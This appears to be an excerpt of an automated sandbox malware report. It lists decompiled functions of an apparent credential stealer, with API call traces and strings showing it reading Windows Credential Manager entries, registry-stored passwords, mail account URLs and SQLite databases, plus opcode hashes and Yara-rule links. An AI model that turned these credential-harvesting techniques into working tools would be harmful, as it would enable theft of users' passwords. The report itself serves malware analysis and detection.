                                                                                                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                                                                                                    • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                    Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                    Function 0040F802 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                                    • API String ID: 551151806-1288872324
                                                                                                                                                                                    • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                    Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                    • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                    Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                    Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                    • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                    Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                    • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                    • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                    Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                    • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                    • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                    Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                    • API String ID: 912701516-1821301763
                                                                                                                                                                                    • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                    Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                    • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                                                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                    Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                    Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 667451143-3916222277
                                                                                                                                                                                    • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                    Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                    • API String ID: 888011440-2039793938
